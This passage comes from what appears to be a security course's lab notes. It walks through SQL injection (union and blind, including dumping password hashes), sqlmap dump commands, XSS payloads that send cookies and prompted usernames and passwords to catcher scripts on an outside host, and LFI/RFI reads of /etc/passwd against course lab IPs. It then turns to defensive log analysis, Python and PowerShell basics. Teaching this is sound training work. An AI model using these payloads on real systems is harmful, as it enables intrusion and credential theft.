2014 Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
2015
2016http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
2017
2018 Negating the parameter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
2019
2020http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
2021http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
2022http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
2023http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
2024
2025
2026
2027
2028
2029- Another way is to see if you can get the backend to perform an arithmetic function
2030http://54.245.184.121/bookdetail.aspx?id=(2)
2031http://54.245.184.121/bookdetail.aspx?id=(4-2)
2032http://54.245.184.121/bookdetail.aspx?id=(4-1)
2033
2034
2035
2036http://54.245.184.121/bookdetail.aspx?id=2 or 1=1--
2037http://54.245.184.121/bookdetail.aspx?id=2 or 1=2--
2038http://54.245.184.121/bookdetail.aspx?id=1*1
2039http://54.245.184.121/bookdetail.aspx?id=2 or 1 >-1#
2040http://54.245.184.121/bookdetail.aspx?id=2 or 1<99#
2041http://54.245.184.121/bookdetail.aspx?id=2 or 1<>1#
2042http://54.245.184.121/bookdetail.aspx?id=2 or 2 != 3--
2043http://54.245.184.121/bookdetail.aspx?id=2 &0#
2044
2045
2046
2047http://54.245.184.121/bookdetail.aspx?id=2 and 1=1--
2048http://54.245.184.121/bookdetail.aspx?id=2 and 1=2--
2049http://54.245.184.121/bookdetail.aspx?id=2 and user='joe' and 1=1--
2050http://54.245.184.121/bookdetail.aspx?id=2 and user='dbo' and 1=1--
2051
2052
2053
2054###############################
2055# Blind SQL Injection Testing #
2056###############################
2057Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
2058
20593 - Total Characters
2060http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
2061http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
2062http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
2063
2064Let's go for a quick check to see if it's DBO
2065http://54.245.184.121/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
2066
2067Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
2068
2069D - 1st Character
2070http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
2071http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
2072http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
2073http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
2074
2075B - 2nd Character
2076http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2077http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2078
2079O - 3rd Character
2080http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2081http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
2082http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2083http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2084http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
2085http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
2086http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2087
2088
2089
2090
2091
2092 ##########
2093# Sqlmap #
2094##########
2095If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
2096
2097cd /home/strategicsec/toolz/sqlmap-dev/
2098python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -b
2099python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --current-user
2100python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --current-db
2101python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --dbs
2102python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp --tables
2103python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
2104python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
2105python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
2106python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
2107python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --users --passwords
2108
2109 #######################
2110# Attacking PHP/MySQL #
2111#######################
2112
2113Go to the LAMP target homepage
2114http://45.63.104.73/
2115
2116
2117
2118Clicking on the Acer Link:
2119http://45.63.104.73/acre2.php?lap=acer
2120
2121 - Found parameter passing (answer yes to question 1)
2122 - Insert ' to test for SQLI
2123
2124http://45.63.104.73/acre2.php?lap=acer'
2125
2126
2127Page returns the following error:
2128You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
2129
2130
2131
2132In order to perform union-based sql injection - we must first determine the number of columns in this query.
2133We do this using the ORDER BY clause
2134http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
2135
2136Page returns the following error:
2137Unknown column '100' in 'order clause'
2138
2139
2140
2141http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
2142
2143Page returns the following error:
2144Unknown column '50' in 'order clause'
2145
2146
2147
2148http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
2149Page returns the following error:
2150Unknown column '25' in 'order clause'
2151
2152
2153
2154http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
2155
2156Page returns the following error:
2157Unknown column '50' in 'order clause'
2158
2159
2160
2161http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
2162---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
2163
2164
2165
2166Now we build out the union all select statement with the correct number of columns
2167
2168Reference:
2169http://www.techonthenet.com/sql/union.php
2170
2171
2172
2173http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
2174
2175
2176
2177Now we negate the parameter value 'acer' by turning it into the word 'null':
2178http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
2179
2180We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
2181
2182
2183Use a cheat sheet for syntax:
2184http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
2185
2186
2187http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
2188
2189http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
2190
2191http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
2192
2193http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
2194
2195
2196http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
2197
2198
2199
2200
2201Sometimes students ask about the "-- j" or "-- +" that I append to the SQL injection attack strings.
2202
2203Here is a good reference for it:
2204https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
2205
2206Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
2207
2208
2209###############################################################################
2210# What is XSS #
2211# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
2212###############################################################################
2213
2214OK - what is Cross Site Scripting (XSS)?
2215
22161. Use Firefox to browse to the following location:
2217
2218 http://45.63.104.73/xss_practice/
2219
2220 A really simple search page that is vulnerable should come up.
2221
2222
2223
2224
22252. In the search box type:
2226
2227 <script>alert('So this is XSS')</script>
2228
2229
2230 This should pop-up an alert window with your message in it proving XSS is in fact possible.
2231 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2232
2233
22343. In the search box type:
2235
2236 <script>alert(document.cookie)</script>
2237
2238
2239 This should pop up an alert window showing your cookie, proving that XSS is in fact possible and that the cookie can be accessed.
2240 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2241
22424. Now replace that alert script with:
2243
2244 <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
2245
2246
2247This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
2248
2249
22505. Now view the stolen cookie at:
2251 http://45.63.104.73/xss_practice/cookie_stealer_logs.html
2252
2253
2254The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
2255
2256
2257
2258
2259
2260
2261############################
2262# A Better Way To Demo XSS #
2263############################
2264
2265
2266Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
2267
2268
2269Use Firefox to browse to the following location:
2270
2271 http://45.63.104.73/xss_practice/
2272
2273
2274
2275Paste this in the search box
2276----------------------------
2277
2278
2279Option 1
2280--------
2281
2282<script>
2283password=prompt('Your session is expired. Please enter your password to continue',' ');
2284document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
2285</script>
2286
2287
2288Now view the captured password at:
2289 http://45.63.104.73/xss_practice/passwords.html
2290
2291
2292
2293Option 2
2294--------
2295<script>
2296username=prompt('Please enter your username',' ');
2297password=prompt('Please enter your password',' ');
2298document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
2299</script>
2300
2301
2302
2303
2304Now view the captured username and password at:
2305http://45.63.104.73/xss_practice/username_password_logs.html
2306
2307
2308
2309
2310#########################################
2311# Let's try a local file include (LFI) #
2312#########################################
2313- Here is an example of an LFI
2314- Open this page in Firefox:
2315http://45.63.104.73/showfile.php?filename=contactus.txt
2316
2317- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
2318- Here you see a direct reference to a file on the local filesystem of the victim machine.
2319- You can attack this by doing the following:
2320http://45.63.104.73/showfile.php?filename=/etc/passwd
2321
2322- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
2323- somewhere else on the Internet. Here is an example of a text file on the web:
2324http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
2325
2326- Now we can attack the target via RFI like this:
2327http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
2328
2329
2330
2331
2332###############################
2333# How much fuzzing is enough? #
2334###############################
2335There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
2336
2337Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
2338
2339
2340Step 1: Ask yourself the 3 questions per page of the site.
2341
2342Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
2343
2344Step 3: When you load your fuzz strings - use the following decision tree
2345
2346 - Are the fuzz strings causing a default error message (example 404)?
2347 - If this is the case then it is most likely NOT vulnerable
2348
2349 - Are the fuzz strings causing a WAF or LB custom error message?
2350 - If this is the case then you need to find an encoding method to bypass
2351
2352
2353 - Are the fuzz strings causing an error message that discloses the backend type?
2354 - If yes, then identify DB type and find correct syntax to successfully exploit
2355 - Some example strings that I use are:
2356 '
2357 "
2358 () <----- Take the parameter value and put it in parenthesis
2359 (5-1) <----- See if you can perform an arithmetic function
2360
2361
2362 - Are the fuzz strings rendering executable code?
2363 - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
2364 - Some example strings that I use are:
2365 <b>hello</b>
2366 <u>hello</u>
2367 <script>alert(123);</script>
2368 <script>alert(xss);</script>
2369 <script>alert('xss');</script>
2370 <script>alert("xss");</script>
2371
2372
2373
2374
2375#################
2376# Log Analysis #
2377#################
2378
2379VM for these labs
2380-----------------
2381- InfoSec Addicts Ubuntu Virtual Machine
2382https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
2383user: infosecaddicts
2384pass: infosecaddicts
2385
2386
2387- Windows 7 Virtual Machine
2388https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
2389user: workshop
2390pass: password
2391
2392
2393
2394
2395##############################################
2396# Log Analysis with Linux command-line tools #
2397##############################################
2398The following command line executables are found on macOS as well as in most Linux distributions.
2399
2400cat – prints the content of a file in the terminal window
2401grep – searches and filters based on patterns
2402awk – can sort each row into fields and display only what is needed
2403sed – performs find and replace functions
2404sort – arranges output in an order
2405uniq – compares adjacent lines and can report, filter or provide a count of duplicates
2406
2407
2408
2409
2410##############
2411# Cisco Logs #
2412##############
2413
2414---------------------------Type This-----------------------------------
2415
2416wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
2417-----------------------------------------------------------------------
2418
2419
2420AWK Basics
2421----------
2422To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
2423
2424---------------------------Type This-----------------------------------
2425
2426cat cisco.log | awk '{print $5}' | tail -n 4
2427-----------------------------------------------------------------------
2428
2429
2430
2431
2432Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in "$5", group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through "sort", using "uniq -c" to count the like entries, then using "sort -rn" to sort it in reverse order.
2433
2434---------------------------Type This-----------------------------------
2435
2436cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
2437-----------------------------------------------------------------------
2438
2439
2440
2441
2442While that's sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren't conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This ensures that we are at least looking at lines of text that contain "facility-level-mnemonic".
2443
2444---------------------------Type This-----------------------------------
2445
2446cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
2447-----------------------------------------------------------------------
2448
2449
2450
2451
2452
2453Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
2454
2455---------------------------Type This-----------------------------------
2456
2457cat cisco.log | grep %LINEPROTO-5-UPDOWN:
2458
2459cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
2460
2461cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
2462
2463cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
2464-----------------------------------------------------------------------
2465
2466
2467
2468
2469#################################
2470# Using Python for log analysis #
2471#################################
2472
2473
2474
2475
2476###########################################
2477# Python Basics Lesson 1: Simple Printing #
2478###########################################
2479
2480---------------------------Type This-----------------------------------
2481
2482>>> print 1
2483
2484>>> print hello
2485
2486>>> print "hello"
2487
2488>>> print "Today we are learning Python."
2489-----------------------------------------------------------------------
2490
2491
2492
2493###################################################
2494# Python Basics Lesson 2: Simple Numbers and Math #
2495###################################################
2496
2497---------------------------Type This-----------------------------------
2498
2499>>> 2+2
2500
2501>>> 6-3
2502
2503>>> 18/7
2504
2505>>> 18.0/7
2506
2507>>> 18.0/7.0
2508
2509>>> 18/7
2510
2511>>> 9%4
2512
2513>>> 8%4
2514
2515>>> 8.75%.5
2516
2517>>> 6.*7
2518
2519>>> 6*6*6
2520
2521>>> 6**3
2522
2523>>> 5**12
2524
2525>>> -5**4
2526
2527-----------------------------------------------------------------------
2528
2529
2530
2531
2532
2533#####################################
2534# Python Basics Lesson 3: Variables #
2535#####################################
2536
2537---------------------------Type This-----------------------------------
2538
2539>>> x=18
2540
2541>>> x+15
2542
2543>>> x**3
2544
2545>>> y=54
2546
2547>>> x+y
2548
2549>>> age=input("Enter number here: ")
2550 43
2551
2552>>> age+32
2553
2554>>> age**3
2555
2556>>> fname = raw_input("Enter your first name: ")
2557
2558>>> lname = raw_input("Enter your first name: ")
2559
2560>>> fname = raw_input("Enter your name: ")
2561Enter your name: Joe
2562
2563>>> lname = raw_input("Enter your name: ")
2564Enter your name: McCray
2565
2566>>> print fname
2567Joe
2568
2569>>> print lname
2570McCray
2571
2572>>> print fname lname
2573
2574>>> print fname+lname
2575JoeMcCray
2576-----------------------------------------------------------------------
2577
2578
2579
2580NOTE:
2581Use input() for integers and expressions, and use raw_input() when you are dealing with strings (in Python 2, input() evaluates whatever is typed as a Python expression, so only use it on input you trust).
2582
2583
2584
2585
2586
2587#################################################
2588# Python Basics Lesson 4: Modules and Functions #
2589#################################################
2590
2591---------------------------Type This-----------------------------------
2592
2593>>> 5**4
2594
2595>>> pow(5,4)
2596
2597>>> abs(-18)
2598
2599>>> abs(5)
2600
2601>>> floor(18.7)
2602
2603>>> import math
2604
2605>>> math.floor(18.7)
2606
2607>>> math.sqrt(81)
2608
2609>>> joe = math.sqrt
2610
2611>>> joe(9)
2612
2613>>> joe=math.floor
2614
2615>>> joe(19.8)
2616
2617-----------------------------------------------------------------------
2618
2619
2620
2621
2622
2623
2624
2625
2626###################################
2627# Python Basics Lesson 5: Strings #
2628###################################
2629
2630---------------------------Type This-----------------------------------
2631
2632>>> "XSS"
2633
2634>>> 'SQLi'
2635
2636>>> "Joe's a python lover"
2637
2638>>> 'Joe\'s a python lover'
2639
2640>>> "Joe said \"InfoSec is fun\" to me"
2641
2642>>> a = "Joe"
2643
2644>>> b = "McCray"
2645
2646>>> a, b
2647
2648>>> a+b
2649
2650-----------------------------------------------------------------------
2651
2652
2653
2654
2655
2656
2657
2658########################################
2659# Python Basics Lesson 6: More Strings #
2660########################################
2661
2662---------------------------Type This-----------------------------------
2663
2664>>> num = 10
2665
2666>>> num + 2
2667
2668>>> "The number of open ports found on this system is " + num
2669
2670>>> num = str(18)
2671
2672>>> "There are " + num + " vulnerabilities found in this environment."
2673
2674>>> num2 = 46
2675
2676>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
2677-----------------------------------------------------------------------
2678
2679
2680
2681NOTE:
2682Use input() for integers and expressions, and use raw_input() when you are dealing with strings. In Python 2, input() evaluates whatever is typed as a Python expression, so use raw_input() (which returns plain text) for anything that comes from an untrusted user.
2683
2684
2685
2686
2687
2688
2689
2690###############################################
2691# Python Basics Lesson 7: Sequences and Lists #
2692###############################################
2693
2694---------------------------Type This-----------------------------------
2695
2696>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
2697
2698>>> attacks
2699['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
2700
2701>>> attacks[3]
2702'SQL Injection'
2703
2704>>> attacks[-2]
2705'Cross-Site Scripting'
2706-----------------------------------------------------------------------
2707
2708
2709
2710
2711
2712
2713########################################
2714# Python Basics Level 8: If Statement #
2715########################################
2716
2717---------------------------Type This-----------------------------------
2718
2719>>> attack="SQLI"
2720>>> if attack=="SQLI":
2721 print 'The attacker is using SQLI'
2722
2723>>> attack="XSS"
2724>>> if attack=="SQLI":
2725 print 'The attacker is using SQLI'
2726-----------------------------------------------------------------------
2727
2728
2729#############################
2730# Reference Videos To Watch #
2731#############################
2732Here is your first set of youtube videos that I'd like for you to watch:
2733https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
2734
2735
2736
2737
2738
2739#####################################
2740# Lesson 9: Intro to Log Analysis #
2741#####################################
2742
2743Log in to your StrategicSec Ubuntu machine. You can download the VM from the following link:
2744
2745- InfoSec Addicts Ubuntu Virtual Machine
2746https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
2747user: infosecaddicts
2748pass: infosecaddicts
2749
2750
2751
2752Then execute the following commands:
2753
2754---------------------------Type This-----------------------------------
2755
2756
2757wget https://s3.amazonaws.com/infosecaddictsfiles/access_log
2758
2759
2760cat access_log | grep 141.101.80.188
2761
2762cat access_log | grep 141.101.80.187
2763
2764cat access_log | grep 108.162.216.204
2765
2766cat access_log | grep 173.245.53.160
2767
2768---------------------------------------------------------
2769
2770Google the following terms:
2771 - Python read file
2772 - Python read line
2773 - Python read from file
2774
2775
2776
2777
2778########################################################
2779# Lesson 10: Use Python to read in a file line by line #
2780########################################################
2781
2782
2783Reference:
2784http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
2785
2786
2787
2788
2789
2790
2791Let's have some fun.....
2792
2793---------------------------Type This-----------------------------------
2794
2795>>> f = open('access_log', "r")
2796
2797>>> lines = f.readlines()
2798
2799>>> print lines
2800
2801>>> lines[0]
2802
2803>>> lines[10]
2804
2805>>> lines[50]
2806
2807>>> lines[1000]
2808
2809>>> lines[5000]
2810
2811>>> lines[10000]
2812
2813>>> print len(lines)
2814
2815
2816
2817
2818
2819
2820
2821
2822
2823---------------------------Type This-----------------------------------
2824vi logread1.py
2825
2826---------------------------Paste This-----------------------------------
2827
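## Open the file in read-only mode.
## "with" closes the file automatically when the block ends, even if
## reading or printing raises an exception (an explicit f.close() after
## the print is skipped when an error happens first).
with open('access_log', "r") as f:
    ## use readlines to read all lines in the file
    ## The variable "lines" is a list containing all lines
    ## (the whole file is loaded into memory at once).
    lines = f.readlines()

## print(...) with a single argument behaves the same on Python 2 and 3.
print(lines)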
2840
2841---------------------------------------------------------
2842
2843
2844Google the following:
2845 - python difference between readlines and readline
2846 - python readlines and readline
2847
2848
2849
2850
2851
2852#################################
2853# Lesson 11: A quick challenge #
2854#################################
2855
2856Can you write an if/then statement that looks for this IP and prints "Found it"?
2857
2858
2859141.101.81.187
2860
2861
2862
2863
2864
2865
2866---------------------------------------------------------
2867Hint 1: Use Python to look for a value in a list
2868
2869Reference:
2870http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
2871
2872
2873
2874
2875---------------------------------------------------------
2876Hint 2: Use Python to prompt for user input
2877
2878Reference:
2879http://www.cyberciti.biz/faq/python-raw_input-examples/
2880
2881
2882
2883
2884---------------------------------------------------------
2885Hint 3: Use Python to search for a string in a list
2886
2887Reference:
2888http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
2889
2890
2891
2892
2893
2894Here is my solution:
2895-------------------
2896$ python
2897>>> f = open('access_log', "r")
2898>>> lines = f.readlines()
2899>>> ip = '141.101.81.187'
2900>>> for string in lines:
2901... if ip in string:
2902... print(string)
2903
2904
2905
2906
2907Here is one student's solution - can you please explain each line of this code to me?
2908-------------------------------------------------------------------------------------
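#!/usr/bin/python
## Print every access_log line whose leading client-address field equals
## the IP address the user types in.
## Assumes each log line starts with the client address followed by " - "
## (the usual Apache access log layout) - confirm against your access_log.

## Ask for the IP once. strip() removes stray surrounding whitespace so
## "1.2.3.4 " still matches; raw_input() returns the typed text as a string.
strUsrinput = raw_input("Enter IP Address: ").strip()

## "with" closes the file automatically when the block ends, even if an
## exception is raised inside the loop (a trailing f.close() would be
## skipped in that case).
with open('access_log') as f:
    ## A file object is already iterable line by line; iter(f) is not needed.
    for line in f:
        ## The text before the first " - " is the client address field.
        ip = line.split(" - ")[0]
        ## Exact comparison: 1.2.3.4 does not match 1.2.3.45.
        if ip == strUsrinput:
            ## One-argument print behaves the same on Python 2 and 3; the
            ## line keeps its own newline, so the output is double spaced.
            print(line)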
2921
2922
2923
2924
2925-------------------------------
2926
2927Working with another student after class we came up with another solution:
2928
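#!/usr/bin/env python

# Search access_log for a user-supplied IP address and print every line
# that contains it.

# Ask the user which IP to look for. strip() removes accidental surrounding
# whitespace, which would otherwise silently prevent any match.
userinput = raw_input("Enter the IP you want to search for: ").strip()

# Open the log file read-only. "with" closes it when the block ends, even
# on an error - without it the file is never closed at all.
with open('access_log', "r") as f:
    # readlines() stores each line of the log as an element of the list
    # "lines" (the whole file is read into memory at once).
    lines = f.readlines()

# Print every line that contains the requested IP anywhere in it.
# NOTE: this is a substring match, so searching for 10.0.0.1 also prints
# lines for 10.0.0.10 or 210.0.0.1; compare the client field exactly if
# that matters. An empty input matches every line.
for ip in lines:
    if userinput in ip:
        print(ip)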
2948
2949
2950
2951##################################################
2952# Lesson 12: Look for web attacks in a log file #
2953##################################################
2954
2955In this lab we will look at the scan_log.py script, which scans a web server log for common attack attempts.
2956Supported attacks:
29571. SQL Injection
29582. Local File Inclusion
29593. Remote File Inclusion
29604. Cross-Site Scripting
2961
2962
2963---------------------------Type This-----------------------------------
2964
2965wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py
2966-----------------------------------------------------------------------
2967
2968- The usage for scan_log.py is simple. You feed it an apache log file.
2969
2970---------------------------Type This-----------------------------------
2971
2972cat scan_log.py | less (use your up/down arrow keys to look through the file)
2973-----------------------------------------------------------------------
2974
2975
2976
2977
2978
2979################################
2980# Log Analysis with Powershell #
2981################################
2982
2983VM for these labs
2984-----------------
2985https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
2986 username: workshop
2987 password: password
2988
2989
2990You can do the updates in the Win7 VM (yes, it is a lot of updates).
2991
2992You'll need to create a directory in the Win7 VM called "c:\ps"
2993
2994#####################
2995# Powershell Basics #
2996#####################
2997
2998PowerShell is Microsoft's scripting language; it has shipped built into Windows since the release of Windows Vista.
2999
3000PowerShell script files use the .ps1 extension.
3001
3002An important note is that you cannot double click on a PowerShell script to execute it.
3003
3004To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
3005
3006---------------------------Type This-----------------------------------
3007
3008dir
3009cd
3010ls
3011cd c:\
3012-----------------------------------------------------------------------
3013
3014
3015To obtain a list of cmdlets, use the Get-Command cmdlet
3016
3017---------------------------Type This-----------------------------------
3018
3019Get-Command
3020-----------------------------------------------------------------------
3021
3022
3023
3024You can use the Get-Alias cmdlet to see a full list of aliased commands.
3025
3026---------------------------Type This-----------------------------------
3027
3028Get-Alias
3029-----------------------------------------------------------------------
3030
3031
3032
3033Don't worry you won't blow up your machine with Powershell
3034
3035---------------------------Type This-----------------------------------
3036
3037Get-Process | stop-process          What will this command do? (Don't run this line as-is; the -whatif form on the next line only previews what it would stop.)
3038Get-Process | stop-process -whatif
3039-----------------------------------------------------------------------
3040
3041
3042To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
3043
3044---------------------------Type This-----------------------------------
3045
3046Get-Help Get-Command
3047
3048Get-Help Get-Service –online
3049
3050Get-Service -Name TermService, Spooler
3051
3052Get-Service –N BITS
3053
3054Start-Transcript
3055-----------------------------------------------------------------------
3056
3057PowerShell variables begin with the $ symbol. First, let's create a variable.
3058
3059---------------------------Type This-----------------------------------
3060
3061$serv = Get-Service –N Spooler
3062-----------------------------------------------------------------------
3063
3064To see the value of a variable you can just call it in the terminal.
3065
3066---------------------------Type This-----------------------------------
3067
3068$serv
3069
3070$serv.gettype().fullname
3071-----------------------------------------------------------------------
3072
3073
3074Get-Member is another extremely useful cmdlet that enumerates the available methods and properties of an object. You can pipe the object to Get-Member or pass it in with -InputObject.
3075
3076---------------------------Type This-----------------------------------
3077
3078$serv | Get-Member
3079
3080Get-Member -InputObject $serv
3081-----------------------------------------------------------------------
3082
3083
3084
3085
3086
3087Let's use a method and a property with our object.
3088
3089---------------------------Type This-----------------------------------
3090
3091$serv.Status
3092$serv.Stop()
3093$serv.Refresh()
3094$serv.Status
3095$serv.Start()
3096$serv.Refresh()
3097$serv.Status
3098-----------------------------------------------------------------------
3099
3100
3101
3102
3103Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.
3104
3105
3106
3107#############################
3108# Simple Event Log Analysis #
3109#############################
3110
3111Step 1: Dump the event logs
3112---------------------------
3113The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
3114
